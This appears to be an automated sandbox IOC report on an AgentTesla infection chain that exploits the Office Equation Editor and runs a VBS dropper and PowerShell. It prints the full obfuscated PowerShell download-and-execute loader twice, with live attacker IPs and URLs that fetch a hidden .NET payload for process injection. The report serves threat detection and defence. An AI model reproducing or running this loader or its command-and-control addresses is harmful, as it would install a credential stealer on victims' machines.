Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding

Details

Is windows:	true
Is dropped:	false
PID:	2836
Target ID:	0
Parent PID:	564
Name:	EXCEL.EXE
Class:	excel
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Size:	28253536
MD5:	D53B85E21886D2AF9815C377537BCAC3
Time:	00:23:00
Date:	05/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x13fe90000
Modulesize:	28282880
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Details

Is windows:	true
Is dropped:	false
PID:	2772
Target ID:	2
Parent PID:	564
Name:	EQNEDT32.EXE
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Size:	543304
MD5:	A87236E214F6D42A65F5DEDAC816AEC8
Time:	00:23:49
Date:	05/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x400000
Modulesize:	581632
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: EQNEDT32.EXE connecting to internet	Exploits
Sigma detected: File Dropped By EQNEDT32EXE	Exploits
Document exploit detected (process start blacklist hit)	Software Vulnerabilities	Exploitation for Client Execution
Sigma detected: Equation Editor Network Connection	System Summary
Sigma detected: Suspicious Microsoft Office Child Process	System Summary
Sigma detected: WScript or CScript Dropper	System Summary
Office Equation Editor has been started	Exploits
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Sigma detected: Modification of IE Registry Settings	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\SysWOW64\wscript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs"

Details

Is windows:	true
Is dropped:	false
PID:	1968
Target ID:	5
Parent PID:	2772
Name:	wscript.exe
Class:	system-tools
Path:	C:\Windows\SysWOW64\wscript.exe
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs"
Size:	141824
MD5:	979D74799EA6C8B8167869A68DF5204A
Time:	00:23:52
Date:	05/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x710000
Modulesize:	155648
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)	Exploits	Exploitation for Client Execution
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands	System Summary
Sigma detected: Script Initiated Connection to Non-Local Network	System Summary
Sigma detected: Suspicious Microsoft Office Child Process	System Summary
Sigma detected: WScript or CScript Dropper	System Summary
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Script Initiated Connection	System Summary
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Executes visual basic scripts	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex"

Details

Is windows:	true
Is dropped:	false
PID:	540
Target ID:	6
Parent PID:	1968
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)\| iex"
Size:	427008
MD5:	EB32C070E658937AA9FA9F3AE629B2B8
Time:	00:23:53
Date:	05/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0xde0000
Modulesize:	438272
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Yara detected AgentTesla	Stealing of Sensitive Information, Remote Access Functionality
Yara detected Powershell download and execute	HIPS / PFW / Operating System Protection Evasion
Obfuscated command line found	Data Obfuscation	Command and Scripting Interpreter Deobfuscate/Decode Files or Information
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands	System Summary
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Yara detected Generic Downloader	Networking
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Yara detected Credential Stealer	Stealing of Sensitive Information
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Sigma detected: PowerShell Script Dropped Via PowerShell.EXE	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

Details

Is windows:	true
Is dropped:	false
PID:	2888
Target ID:	8
Parent PID:	540
Name:	AddInProcess32.exe
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Size:	42056
MD5:	EFBCDD2A3EBEA841996AEF00417AA958
Time:	00:23:57
Date:	05/07/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0xf50000
Modulesize:	49152
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Yara detected AgentTesla	Stealing of Sensitive Information, Remote Access Functionality
Injects a PE file into a foreign processes	HIPS / PFW / Operating System Protection Evasion	Process Injection
Writes to foreign memory regions	HIPS / PFW / Operating System Protection Evasion	Process Injection
Yara detected Generic Downloader	Networking
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Queries the volume information (name, serial number etc) of a device	Language, Device and Operating System Detection	System Information Discovery
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs	System Summary
Yara detected Credential Stealer	Stealing of Sensitive Information
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://91.92.254.194/imge/new-image_v.jpgEnN;

unknown

http://91.92.254.194

unknown

http://91.92.254.194/imge/new-image_v.jpg

91.92.254.194

http://192.3.216.148/base64.txt

192.3.216.148

http://192.3.216.148/datingloverstartingAgain.vbs

192.3.216.148

http://91.92.254.29/Users_API/BrainiacMAX/file_njk01aso.gqz.txtVO

unknown

http://nuget.org/NuGet.exe

unknown

https://account.dyn.com/

unknown

http://192.3.216.148

unknown

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

https://contoso.com/License

unknown

http://ip-api.com

unknown

https://contoso.com/Icon

unknown

http://192.3.216.148/base6L

unknown

http://192.3.216.148/datingloverstartingAgain.vbsj

unknown

http://192.3.2168

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

http://91.92.254.29/Users_API/BrainiacMAX/file_njk01aso.gqz.txt

unknown

http://ip-api.com/line/?fields=hosting

208.95.112.1

There are 10 hidden URLs, click here to show them.

Domains

Name

Malicious

ip-api.com

208.95.112.1

Details

Name:	ip-api.com
IP:	208.95.112.1
TargetID:	8
Current Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Check if machine is in data center or colocation facility	Malware Analysis System Evasion	Security Software Discovery
HTTP GET or POST without a user agent	Networking
May check the online IP address of the machine	Networking	System Network Configuration Discovery
Potential document exploit detected (performs DNS queries)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs	System Summary
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

91.92.254.29

unknown

Bulgaria

Details

IP:	91.92.254.29
TargetID:	5
Current Path:	C:\Windows\SysWOW64\wscript.exe
Country:	Bulgaria
Countrycode:	BGR
ASN number:	34368
ASN name:	THEZONEBG
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Snort IDS alert for network traffic	Networking
System process connects to network (likely due to code injection or exploit)	Networking, HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Script Initiated Connection to Non-Local Network	System Summary
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (unknown TCP traffic)	Software Vulnerabilities	Exploitation for Client Execution
Sigma detected: Script Initiated Connection	System Summary
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking

208.95.112.1

ip-api.com

United States

Details

IP:	208.95.112.1
TargetID:	8
Current Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Country:	United States
Countrycode:	USA
ASN number:	53334
ASN name:	TUT-ASUS
Private:	false
Domain:	ip-api.com

Signature Hits	Behavior Group	Mitre Attack
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution

192.3.216.148

unknown

United States

Details

IP:	192.3.216.148
TargetID:	2
Current Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Country:	United States
Countrycode:	USA
ASN number:	36352
ASN name:	AS-COLOCROSSINGUS
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: EQNEDT32.EXE connecting to internet	Exploits
Snort IDS alert for network traffic	Networking
Office equation editor establishes network connection	Exploits	Exploitation for Client Execution
Sigma detected: Equation Editor Network Connection	System Summary
HTTP GET or POST without a user agent	Networking
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (unknown TCP traffic)	Software Vulnerabilities	Exploitation for Client Execution
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking

91.92.254.194

unknown

Bulgaria

Details

IP:	91.92.254.194
TargetID:	6
Current Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Country:	Bulgaria
Countrycode:	BGR
ASN number:	34368
ASN name:	THEZONEBG
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Snort IDS alert for network traffic	Networking
Obfuscated command line found	Data Obfuscation	Command and Scripting Interpreter Deobfuscate/Decode Files or Information
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
HTTP GET or POST without a user agent	Networking
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (unknown TCP traffic)	Software Vulnerabilities	Exploitation for Client Execution
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

74*

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel

Enabled

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel

MTTT

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle

ReviewToken

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

k8*

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents

LastPurgeTime

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1033

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage

EXCELFiles

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage

ProductFiles

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage

VBAFiles

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage

EquationEditorFilesIntl_1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage

EquationEditorFilesIntl_1033

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

SavedLegacySettings

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS

FileDirectory

There are 28 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

3419000

trusted library allocation

page read and write

33B9000

trusted library allocation

page read and write

402000

remote allocation

page execute and read and write

41E000

heap

page read and write

2E63000

heap

page read and write

3B2F000

stack

page read and write

475000

heap

page read and write

51F000

heap

page read and write

49B000

heap

page read and write

8CBE000

stack

page read and write

CD000

trusted library allocation

page execute and read and write

5D6E000

stack

page read and write | page guard

4D7000

heap

page read and write

487000

heap

page read and write

1FC0000

direct allocation

page read and write

9740000

heap

page read and write

CB000

stack

page read and write

494000

heap

page read and write

4C6000

heap

page read and write

228D000

trusted library allocation

page read and write

376000

stack

page read and write

450000

trusted library allocation

page read and write

447000

heap

page read and write

467000

heap

page read and write

4CEE000

stack

page read and write

3620000

trusted library allocation

page read and write

4AF000

heap

page read and write

63D000

stack

page read and write

54BE000

stack

page read and write

498000

heap

page read and write

1F9E000

stack

page read and write

202000

trusted library allocation

page read and write

5ADE000

stack

page read and write

492000

heap

page read and write

64C000

heap

page read and write

4F04000

heap

page read and write

770000

heap

page read and write

5791000

heap

page read and write

8E0000

trusted library allocation

page read and write

447B000

stack

page read and write

5A0000

trusted library allocation

page read and write

677000

heap

page read and write

492000

heap

page read and write

320000

trusted library allocation

page read and write

2062000

heap

page read and write

130000

heap

page read and write

45D0000

trusted library allocation

page read and write

483000

heap

page read and write

AB0000

heap

page read and write

3A3000

heap

page read and write

619E000

stack

page read and write

350000

heap

page read and write

447E000

stack

page read and write

4B6E000

stack

page read and write

75E000

stack

page read and write

44F000

heap

page read and write

5F2E000

stack

page read and write

5C70000

heap

page read and write

220000

heap

page read and write

3361000

trusted library allocation

page read and write

4CF000

heap

page read and write

D6000

trusted library allocation

page execute and read and write

5532000

heap

page read and write

9350000

trusted library allocation

page read and write

10000

heap

page read and write

2CD000

stack

page read and write

65D000

heap

page read and write

2414000

trusted library allocation

page read and write

4D3E000

stack

page read and write

880F000

heap

page read and write

894C000

stack

page read and write

9000000

heap

page read and write

358000

heap

page read and write

DDD000

stack

page read and write

4C6000

heap

page read and write

49B000

heap

page read and write

6A3000

heap

page read and write

400000

remote allocation

page execute and read and write

1F24000

heap

page read and write

30E0000

heap

page read and write

6C9000

heap

page read and write

8814000

heap

page read and write

AA0000

trusted library allocation

page read and write

10000

heap

page read and write

4F4000

heap

page read and write

8FFD000

stack

page read and write

5F0000

heap

page execute and read and write

3CA0000

heap

page read and write

33A0000

trusted library allocation

page read and write

DA000

trusted library allocation

page execute and read and write

4502000

trusted library allocation

page read and write

47AE000

stack

page read and write

3CD000

stack

page read and write

497000

heap

page read and write

5EBE000

stack

page read and write

623A000

trusted library allocation

page read and write

249F000

trusted library allocation

page read and write

4580000

trusted library allocation

page read and write

48A000

heap

page read and write

5C0E000

stack

page read and write

3EEF000

stack

page read and write

51E000

stack

page read and write

D0E000

stack

page read and write

4B1E000

stack

page read and write

492000

heap

page read and write

298F000

stack

page read and write

27F000

stack

page read and write

9350000

trusted library allocation

page read and write

24BF000

stack

page read and write

4B6000

heap

page read and write

650000

heap

page read and write

11A000

stack

page read and write

657000

heap

page read and write

87FF000

heap

page read and write

4DDE000

stack

page read and write

4C5000

heap

page read and write

478000

heap

page read and write

44C000

heap

page read and write

49B000

heap

page read and write

4C2E000

stack

page read and write

353F000

stack

page read and write

44A0000

trusted library allocation

page execute and read and write

397000

heap

page read and write

C0000

trusted library allocation

page read and write

5513000

heap

page read and write

4B6000

heap

page read and write

530000

trusted library allocation

page read and write

590000

trusted library allocation

page read and write

487000

heap

page read and write

43D000

heap

page read and write

25E000

stack

page read and write

2040000

heap

page read and write

489E000

stack

page read and write

160000

heap

page read and write

210000

remote allocation

page read and write

5C74000

heap

page read and write

475000

heap

page read and write

4F90000

heap

page read and write

6689000

trusted library allocation

page read and write

91A0000

heap

page read and write

460000

heap

page read and write

AB8000

heap

page read and write

4B80000

heap

page execute and read and write

4DE0000

heap

page read and write

9AF000

stack

page read and write

9350000

trusted library allocation

page read and write

120000

trusted library allocation

page read and write

5F80000

heap

page read and write

400000

heap

page read and write

2251000

trusted library allocation

page read and write

240000

trusted library allocation

page execute and read and write

6C7000

heap

page read and write

499F000

stack

page read and write

2D0000

heap

page read and write

48A000

heap

page read and write

92E0000

trusted library allocation

page read and write

43F000

heap

page read and write

10000

heap

page read and write

4F2D000

heap

page read and write

4C5000

heap

page read and write

9350000

trusted library allocation

page read and write

260000

trusted library allocation

page read and write

4D0000

trusted library allocation

page read and write

411E000

stack

page read and write

8B5F000

stack

page read and write

A0000

trusted library allocation

page read and write

417000

heap

page read and write

401000

heap

page read and write

483000

heap

page read and write

61A1000

trusted library allocation

page read and write

9350000

trusted library allocation

page read and write

678000

trusted library allocation

page read and write

5BA000

heap

page read and write

48A000

heap

page read and write

33B2000

trusted library allocation

page read and write

3EA000

heap

page read and write

5250000

heap

page read and write

F2F000

stack

page read and write

3628000

heap

page read and write

7EF40000

trusted library allocation

page execute and read and write

A16000

heap

page execute and read and write

477000

heap

page read and write

498000

heap

page read and write

123000

trusted library allocation

page execute and read and write

5C00000

heap

page read and write

35E0000

heap

page read and write

92E0000

trusted library allocation

page read and write

5D1E000

stack

page read and write

446000

heap

page read and write

375000

heap

page read and write

5E5D000

stack

page read and write

9350000

trusted library allocation

page read and write

389000

stack

page read and write

2D0000

trusted library allocation

page execute and read and write

3030000

heap

page read and write

43E0000

trusted library allocation

page read and write

642000

heap

page read and write

5E1E000

stack

page read and write

8B80000

heap

page read and write

465000

heap

page read and write

9350000

trusted library allocation

page read and write

92DC000

stack

page read and write

DA0000

heap

page read and write

9B0000

trusted library allocation

page read and write

604000

heap

page read and write

242C000

trusted library allocation

page read and write

89000

stack

page read and write

5E0000

heap

page read and write

650000

heap

page read and write

5D6F000

stack

page read and write

4D7000

trusted library allocation

page read and write

2395000

trusted library allocation

page read and write

10000

heap

page read and write

DA4000

heap

page read and write

1E0000

trusted library allocation

page read and write

410000

heap

page read and write

492000

heap

page read and write

242A000

trusted library allocation

page read and write

200000

trusted library allocation

page read and write

4CF000

heap

page read and write

540000

heap

page execute and read and write

9C0000

trusted library allocation

page read and write

4343000

trusted library allocation

page read and write

643000

heap

page read and write

241C000

trusted library allocation

page read and write

483000

heap

page read and write

2389000

trusted library allocation

page read and write

890E000

stack

page read and write

403000

heap

page read and write

5D7000

heap

page read and write

5090000

heap

page read and write

2CB0000

heap

page read and write

580000

trusted library allocation

page execute and read and write

44D000

heap

page read and write

4F6C000

heap

page read and write

4BD000

heap

page read and write

205000

trusted library allocation

page execute and read and write

465D000

stack

page read and write

6669000

trusted library allocation

page read and write

54F0000

heap

page read and write

447000

heap

page read and write

478000

heap

page read and write

4310000

trusted library allocation

page read and write

2CDE000

stack

page read and write

5780000

heap

page read and write

110000

trusted library allocation

page read and write

3861000

trusted library allocation

page read and write

96D000

stack

page read and write

87D0000

heap

page read and write

4B6000

heap

page read and write

9350000

trusted library allocation

page read and write

4DFD000

heap

page read and write

411000

heap

page read and write

243F000

trusted library allocation

page read and write

B9D000

stack

page read and write

8B1F000

stack

page read and write

CCF000

stack

page read and write

124000

trusted library allocation

page read and write

526D000

heap

page read and write

D90000

trusted library allocation

page read and write

69F000

heap

page read and write

2E0000

heap

page read and write

499000

heap

page read and write

2A5E000

stack

page read and write

4BD000

heap

page read and write

5AE000

stack

page read and write

2E00000

heap

page read and write

127000

trusted library allocation

page execute and read and write

49DE000

stack

page read and write

280000

heap

page read and write

5FC0000

heap

page read and write

32B0000

trusted library allocation

page read and write

4ABF000

stack

page read and write

12D000

trusted library allocation

page execute and read and write

2F0E000

stack

page read and write

467000

heap

page read and write

43E000

remote allocation

page execute and read and write

287000

heap

page read and write

2C60000

heap

page read and write

60F000

heap

page read and write

2CBB000

heap

page read and write

288F000

stack

page read and write

5F7E000

stack

page read and write

4D9000

trusted library allocation

page read and write

DC2000

heap

page read and write

1FB0000

heap

page read and write

4CE000

stack

page read and write

4510000

trusted library allocation

page execute and read and write

37C000

stack

page read and write

1EBE000

stack

page read and write

4480000

trusted library allocation

page read and write

9AE000

stack

page read and write | page guard

6B0000

heap

page read and write

20000

heap

page read and write

3210000

heap

page read and write

5DAE000

stack

page read and write

48A000

heap

page read and write

9350000

trusted library allocation

page read and write

48A000

heap

page read and write

4B6000

heap

page read and write

45F000

heap

page read and write

2BCF000

stack

page read and write

A10000

heap

page execute and read and write

B3000

trusted library allocation

page execute and read and write

483000

heap

page read and write

492000

heap

page read and write

4A00000

trusted library allocation

page read and write

3389000

trusted library allocation

page read and write

243C000

trusted library allocation

page read and write

5C4E000

stack

page read and write

1F20000

heap

page read and write

87CD000

stack

page read and write

8DBD000

stack

page read and write

210000

remote allocation

page read and write

4A3000

heap

page read and write

4B6000

heap

page read and write

465000

heap

page read and write

8ADF000

stack

page read and write

4C6000

heap

page read and write

58CF000

stack

page read and write

2ABD000

heap

page read and write

8F0000

heap

page read and write

4490000

trusted library allocation

page read and write

BD000

trusted library allocation

page execute and read and write

2B0000

trusted library section

page read and write

660000

heap

page read and write

492000

heap

page read and write

B7000
